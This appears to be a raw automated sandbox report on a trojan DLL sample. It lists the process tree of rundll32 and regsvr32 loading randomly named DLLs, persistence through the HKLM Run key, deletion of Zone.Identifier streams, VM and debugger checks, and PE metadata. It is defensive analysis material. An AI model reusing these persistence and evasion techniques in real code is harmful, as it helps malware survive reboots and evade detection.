                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800187784_2_0000000180018778
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800127804_2_0000000180012780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FB884_2_000000018001FB88
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013B884_2_0000000180013B88
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022B8C4_2_0000000180022B8C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000CB8D4_2_000000018000CB8D
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008FA04_2_0000000180008FA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180014FA44_2_0000000180014FA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197AC4_2_00000001800197AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800257B44_2_00000001800257B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013FE04_2_0000000180013FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F3E04_2_000000018000F3E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000181048C00004_2_00000181048C0000
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800204545_2_0000000180020454
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180028C945_2_0000000180028C94
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800038A55_2_00000001800038A5
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800248E05_2_00000001800248E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800091445_2_0000000180009144
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180005DB45_2_0000000180005DB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004DDC5_2_0000000180004DDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B1E05_2_000000018000B1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009E385_2_0000000180009E38
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180003BE85_2_0000000180003BE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009BEC5_2_0000000180009BEC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800173F85_2_00000001800173F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180017BF85_2_0000000180017BF8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800154005_2_0000000180015400
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800010005_2_0000000180001000
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000741C5_2_000000018000741C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E8285_2_000000018000E828
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800028345_2_0000000180002834
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180014C485_2_0000000180014C48
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002005C5_2_000000018002005C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800164645_2_0000000180016464
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800054785_2_0000000180005478
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800068805_2_0000000180006880
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002748C5_2_000000018002748C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001308C5_2_000000018001308C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800240985_2_0000000180024098
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B8985_2_000000018001B898
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000C4985_2_000000018000C498
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180004CA05_2_0000000180004CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800110AC5_2_00000001800110AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800148B05_2_00000001800148B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800078B65_2_00000001800078B6
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001CCC5_2_0000000180001CCC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000B8D05_2_000000018000B8D0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800198DC5_2_00000001800198DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800038DC5_2_00000001800038DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800264F85_2_00000001800264F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800084F85_2_00000001800084F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BD005_2_000000018000BD00
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800155085_2_0000000180015508
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018D0C5_2_0000000180018D0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800121105_2_0000000180012110
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B5205_2_000000018001B520
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800291245_2_0000000180029124
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800135245_2_0000000180013524
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180009D245_2_0000000180009D24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023D285_2_0000000180023D28
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800021285_2_0000000180002128
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800209305_2_0000000180020930
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001F5505_2_000000018001F550
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180020D545_2_0000000180020D54
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800109545_2_0000000180010954
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800185605_2_0000000180018560
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E5705_2_000000018000E570
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C9745_2_000000018001C974
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000F1745_2_000000018000F174
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180025D845_2_0000000180025D84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800055905_2_0000000180005590
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800171985_2_0000000180017198
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800159A05_2_00000001800159A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180011DAC5_2_0000000180011DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1AC5_2_000000018000D1AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800069C05_2_00000001800069C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000A1D45_2_000000018000A1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800079D85_2_00000001800079D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001C1DC5_2_000000018001C1DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000D1E05_2_000000018000D1E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800199E85_2_00000001800199E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800099EC5_2_00000001800099EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180028A045_2_0000000180028A04
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001FA085_2_000000018001FA08
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E6145_2_000000018001E614
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180001A1C5_2_0000000180001A1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BA245_2_000000018000BA24
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180021A2C5_2_0000000180021A2C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800192305_2_0000000180019230
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000BE345_2_000000018000BE34
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800122445_2_0000000180012244
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800066505_2_0000000180006650
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800016605_2_0000000180001660
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800116645_2_0000000180011664
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001827C5_2_000000018001827C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800246805_2_0000000180024680
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180022A845_2_0000000180022A84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000AE845_2_000000018000AE84
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800286905_2_0000000180028690
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800156945_2_0000000180015694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800076945_2_0000000180007694
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800136985_2_0000000180013698
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800092985_2_0000000180009298
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018002629C5_2_000000018002629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001629C5_2_000000018001629C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000569C5_2_000000018000569C
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180027EA45_2_0000000180027EA4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800096B85_2_00000001800096B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000EAC45_2_000000018000EAC4
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180018ECC5_2_0000000180018ECC
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001B2F05_2_000000018001B2F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180007AF05_2_0000000180007AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018000E7085_2_000000018000E708
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: gdazhx1EIP.dllVirustotal: Detection: 43%
                      Source: gdazhx1EIP.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\gdazhx1EIP.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll"
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VGdnyYmEzk\YPrp.dll"
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XeFlcoVt\wPzeOKW.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MtAvdtxCDyblyei\mPrhkfVupthqSBxp.dll"
                      Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\cDTWQXzuCIj.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\gdazhx1EIP.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MtAvdtxCDyblyei\mPrhkfVupthqSBxp.dll"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VGdnyYmEzk\YPrp.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll"Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XeFlcoVt\wPzeOKW.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\cDTWQXzuCIj.dll"Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\Jump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@21/2@0/49
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28913CB0 CreateWindowExW,RegisterTouchWindow,MessageBoxW,CoCreateInstance,new,ShowWindow,UpdateWindow,0_2_00007FFC28913CB0
                      Source: C:\Windows\System32\loaddll64.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180005DB4 FindCloseChangeNotification,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,0_2_0000000180005DB4
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\gdazhx1EIP.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: gdazhx1EIP.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: gdazhx1EIP.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Source: gdazhx1EIP.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: gdazhx1EIP.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28908909 push rdi; ret 0_2_00007FFC28908912
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890837D push rdi; ret 0_2_00007FFC28908384
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0D3 push 09B8E1F7h; retf 0_2_000000018001E0DD
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E0E9 push 8B48E1F7h; retf 0_2_000000018001E0F1
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023127 push ebp; ret 0_2_0000000180023128
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E5C5 pushad ; ret 0_2_000000018001E5C7
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022E55 push ebp; retf 0_2_0000000180022E56
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180023A7E push ebp; ret 0_2_0000000180023A86
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180022F5E push ebp; ret 0_2_0000000180022F64
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000838C push eax; ret 0_2_000000018000838E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC28908909 push rdi; ret 3_2_00007FFC28908912
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC2890837D push rdi; ret 3_2_00007FFC28908384
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0D3 push 09B8E1F7h; retf 3_2_000000018001E0DD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E0E9 push 8B48E1F7h; retf 3_2_000000018001E0F1
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023127 push ebp; ret 3_2_0000000180023128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E5C5 pushad ; ret 3_2_000000018001E5C7
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022E55 push ebp; retf 3_2_0000000180022E56
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023A7E push ebp; ret 3_2_0000000180023A86
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022F5E push ebp; ret 3_2_0000000180022F64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000838C push eax; ret 3_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0D3 push 09B8E1F7h; retf 4_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E0E9 push 8B48E1F7h; retf 4_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023127 push ebp; ret 4_2_0000000180023128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E5C5 pushad ; ret 4_2_000000018001E5C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022E55 push ebp; retf 4_2_0000000180022E56
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180023A7E push ebp; ret 4_2_0000000180023A86
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022F5E push ebp; ret 4_2_0000000180022F64
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000838C push eax; ret 4_2_000000018000838E
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0D3 push 09B8E1F7h; retf 5_2_000000018001E0DD
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_000000018001E0E9 push 8B48E1F7h; retf 5_2_000000018001E0F1
                      Source: C:\Windows\System32\rundll32.exeCode function: 5_2_0000000180023127 push ebp; ret 5_2_0000000180023128
                      Source: gdazhx1EIP.dllStatic PE information: section name: .gxfg
                      Source: gdazhx1EIP.dllStatic PE information: section name: .gehcont
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\gdazhx1EIP.dll
                      Source: C:\Windows\System32\rundll32.exePE file moved: C:\Windows\System32\RSNLKxhQH\IhDzTlHldHNg.dllJump to behavior

                      Boot Survival

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IhDzTlHldHNg.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IhDzTlHldHNg.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run IhDzTlHldHNg.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\loaddll64.exeFile opened: C:\Windows\system32\MtAvdtxCDyblyei\mPrhkfVupthqSBxp.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\VGdnyYmEzk\YPrp.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\RSNLKxhQH\IhDzTlHldHNg.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\XeFlcoVt\wPzeOKW.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Users\user\AppData\Local\EHrtIMNuOOnxGF\cDTWQXzuCIj.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 912Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.0 %
                      Source: C:\Windows\System32\loaddll64.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890C334 FindFirstFileExW,0_2_00007FFC2890C334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC2890C334 FindFirstFileExW,3_2_00007FFC2890C334
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000006.00000003.383008257.0000000000533000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.382678517.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505078011.0000000000534000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.769917629.000000000054A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505521799.0000000000547000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505265916.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.505153008.0000000000542000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000005.00000002.262497291.00000222D2D50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}Rt
                      Source: regsvr32.exe, 00000003.00000003.258180696.0000000000A76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28904944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC28904944
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC2890DD90 GetProcessHeap,0_2_00007FFC2890DD90
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28904944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC28904944
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28903AD0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFC28903AD0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC28909474 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC28909474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC28904944 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC28904944
